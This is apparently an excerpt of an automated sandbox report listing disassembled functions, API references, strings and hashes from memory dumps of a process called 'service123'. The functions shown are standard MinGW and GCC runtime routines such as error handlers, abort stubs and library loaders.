Opcode ID: 1e7911d9c7bcfdebbc934af28b9a8e672b5f0371fda080433b5b1803e0c41726
Instruction ID: f940adcd6cc2eb8ee3ea04c38158151a25939d67a10f9fde1d93afc56eb182b2
Opcode Fuzzy Hash: 1e7911d9c7bcfdebbc934af28b9a8e672b5f0371fda080433b5b1803e0c41726
Instruction Fuzzy Hash: 59516D706093498FCB50DF29C484A8A77F5FB9A305F16852DED4887721EB31F845CB92

Function 6C2CA690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C2CA6BF
vfprintf.MSVCRT ref: 6C2CA6DF
abort.MSVCRT ref: 6C2CA6E4
VirtualQuery.KERNEL32 ref: 6C2CA77B

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 6C2CA827
Address %p has no image-section, xrefs: 6C2CA83B
Mingw-w64 runtime failure:, xrefs: 6C2CA6B8
VirtualProtect failed with code 0x%x, xrefs: 6C2CA7F6

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 35657a8f366fb285a02b041e3d53b7a5520f252af601d64a36ba7e16223cf098
Instruction ID: a3751fa37f8962565e6fa0e63f05a7b03295b19d63e9b7d0b4f7b54f1527254c
Opcode Fuzzy Hash: 35657a8f366fb285a02b041e3d53b7a5520f252af601d64a36ba7e16223cf098
Instruction Fuzzy Hash: F6517DB2A04305DFCB50DF28C48568ABBF4FF89358F558A1DE9888B711D730E859CB92

Function 006F1940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 006F196F
vfprintf.MSVCRT ref: 006F198F
abort.MSVCRT ref: 006F1994
VirtualQuery.KERNEL32 ref: 006F1A2B

Strings

VirtualProtect failed with code 0x%x, xrefs: 006F1AA6
Mingw-w64 runtime failure:, xrefs: 006F1968
VirtualQuery failed for %d bytes at address %p, xrefs: 006F1AD7
Address %p has no image-section, xrefs: 006F1AEB

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 6dd271bc3be0cb4f81791abe25b422e1e443528dbb4145240bfe9363ec959947
Instruction ID: 4c4c19eff8f171e1f6e2217ca2bf4b0c234452f03443cbc3116fa908f098b52b
Opcode Fuzzy Hash: 6dd271bc3be0cb4f81791abe25b422e1e443528dbb4145240bfe9363ec959947
Instruction Fuzzy Hash: 9A5178B1508308DFC700EF69D88566AFBE2FF85394F45891DEA888B311DB35E845CB96

Function 6C2CE0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4b7210be431199145f2b619b35a4ba37dae2a583cf157a4ff47159a5f1284636
Instruction ID: 457136e66a8d666a69453bd6db041d82cd6cd9a098ad1b330ce364a053c6c476
Opcode Fuzzy Hash: 4b7210be431199145f2b619b35a4ba37dae2a583cf157a4ff47159a5f1284636
Instruction Fuzzy Hash: F32138323452198FC704CF5CD88299673A6EBC232872C86BEE8488BB55D637A816C7D1

Function 6C2CE570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 2367cec530c3a73eee82ee5f4c162fa2efacb789735927b1b9be979ac1c8c9ac
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: 5B41F27075870B8AD390DF28C04276AB7E1AF81358F604B19FCA487A95E334D94E8BD3

Function 6C2CE59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 465de8950523a9af70b4775ee1843e61795b666fe9664a7098f958528761b84a
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 2921D37074570B4BD790DE28C09266AB7E1AF45319F644F09FCA487A85E334D94E8BD3

Function 6C2CE714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 5c1cf2a2d5655348f0436259f3d4d3847e3ce4494066362c855bde08b7b85515
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 20E026302D821E8AC690CE28C0635A5B7D49F4634CB400A06ECD193D14E730D94FCEC3

Function 6C2D9249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C2D9260
GetProcAddress.KERNEL32 ref: 6C2D927A
LoadLibraryW.KERNEL32 ref: 6C2D929F
GetProcAddress.KERNEL32 ref: 6C2D92B3

Strings

msvcrt.dll, xrefs: 6C2D9255
SystemFunction036, xrefs: 6C2D92A8
advapi32.dll, xrefs: 6C2D9298
rand_s, xrefs: 6C2D926F

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 84145277b074178856905374a4abb7a26a401d7c54e4079b5630a1ad764a14b9
Instruction ID: 288263a3d63ce4c38cd55886ef3936be2f1e82e305588e9d7e52854cad209773
Opcode Fuzzy Hash: 84145277b074178856905374a4abb7a26a401d7c54e4079b5630a1ad764a14b9
Instruction Fuzzy Hash: B3F04FB19543048BCF10BFB8854A24ABBB4FB0A320F01092DE8C597300EA30E435CF67

Function 6C2E73C0 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C2E7411
strlen.MSVCRT ref: 6C2E742B
strlen.MSVCRT ref: 6C2E747B
strlen.MSVCRT ref: 6C2E74D8
strlen.MSVCRT ref: 6C2E752C

Strings

@J:l, xrefs: 6C2E746E, 6C2E7521
*, xrefs: 6C2E7660
basic_string::append, xrefs: 6C2E76CA, 6C2E76D6, 6C2E76E2, 6C2E76EE

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$@J:l$basic_string::append
API String ID: 551667898-2866108539
Opcode ID: d2dda75fd005e7d8fbe68e94d97cb6238d2d8f443a8cf9d9c6fef17ca21daf98
Instruction ID: 2193e5a6b7af8073ff8df2c16419b3808274686b3162233247a17af18419e35a
Opcode Fuzzy Hash: d2dda75fd005e7d8fbe68e94d97cb6238d2d8f443a8cf9d9c6fef17ca21daf98
Instruction Fuzzy Hash: 5FA14D71A086058FDB00EF68C18465EBBF1BF49308F51896DD8989FB45EB35E849CF92

Function 6C35F8C0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C33DA2E), ref: 6C35F95D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C33DA2E), ref: 6C35F988
memmove.MSVCRT ref: 6C35F9D7
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C33DA2E), ref: 6C35FA0D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C33DA2E), ref: 6C35FA58

Strings

basic_string::_M_replace, xrefs: 6C35FBB6

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 8ab510961d841134dccbca23d34499f8995456ce4828ce24315d3ce375055b1f
Instruction ID: d9f87b322dd4f0dbb77964d0326e21dbfd980c0f054dc2f27e0299e7bb97639f
Opcode Fuzzy Hash: 8ab510961d841134dccbca23d34499f8995456ce4828ce24315d3ce375055b1f
Instruction Fuzzy Hash: 538154B5A097419FC300DF2CC19091EBBE1AFCA248F64895EE4D587715D232E898CFA3

Function 6C2CFEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2D00D2
WaitForSingleObject.KERNEL32 ref: 6C2D0117

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 7fe75eb5725f9057fe9785133fb4e129ce6f6c0a6bb82331831988237fbcf140
Instruction ID: 0f62b4ce82b4e329edb183dd0dd00b69e15225b7bff089600d83e8283a13f757
Opcode Fuzzy Hash: 7fe75eb5725f9057fe9785133fb4e129ce6f6c0a6bb82331831988237fbcf140
Instruction Fuzzy Hash: 70616C7070934A9FCBA0DF69C54479777B8EB4A309F11861AEC5887791DB70E8098B92

Function 6C2CE760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: 92c5106bdbb8608c3329819b1a169730f9f5d0f53eaa3491c3604ad5f54d8af6
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: 8F01E571B5921E8FC780DA18C482A9AF7E5AB95314F014E29FC8587B14D234E8DEC7C3

Function 6C2D32C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C2D3391

Strings

0, xrefs: 6C2D380E
o, xrefs: 6C2D3778

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: 451dfc4a5d7985b015bb5da2cdd3a04f41f591248f735c6f00a397f7b9670008
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 21F19F71A146098FDB01CF68C4806DDBBF2BF99364F1A8269EC54AB781D734F945CB90

Function 006F2BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 006F2CC1

Strings

0, xrefs: 006F313E
o, xrefs: 006F30A8

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: 75adb0700ffa27018c42fa0befc35bec5833c408b046a922ff63863bc4dcf855
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: F1F17071A042198FCB14CF68C4906EDBBF3BF89360F298269DA54AB391D734E945CF94

Function 6C2C13E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C2C13F0
LoadLibraryA.KERNEL32 ref: 6C2C1406
GetProcAddress.KERNEL32 ref: 6C2C1425
GetProcAddress.KERNEL32 ref: 6C2C1437

Strings

__deregister_frame_info, xrefs: 6C2C142C
__register_frame_info, xrefs: 6C2C141A
libgcc_s_dw2-1.dll, xrefs: 6C2C13E9, 6C2C13FF

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: cbd6f03a0cbcc220e7682060bbdc58f35f285a7cc10f7dd1b16c71c81f8e414e
Instruction ID: df1acc47a3b9e8e589ad3e94c71d8b88f486f2c2988c261fd2cccc4ef9775fc2
Opcode Fuzzy Hash: cbd6f03a0cbcc220e7682060bbdc58f35f285a7cc10f7dd1b16c71c81f8e414e
Instruction Fuzzy Hash: 590175B6A053089BCB50BF78950729EBFB8AB4A251F01462DE98947711E730C454CFA3

Function 006F14E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006F14F0
LoadLibraryA.KERNEL32 ref: 006F1506
GetProcAddress.KERNEL32 ref: 006F1525
GetProcAddress.KERNEL32 ref: 006F1537

Strings

__register_frame_info, xrefs: 006F151A
__deregister_frame_info, xrefs: 006F152C
libgcc_s_dw2-1.dll, xrefs: 006F14E9, 006F14FF

Memory Dump Source

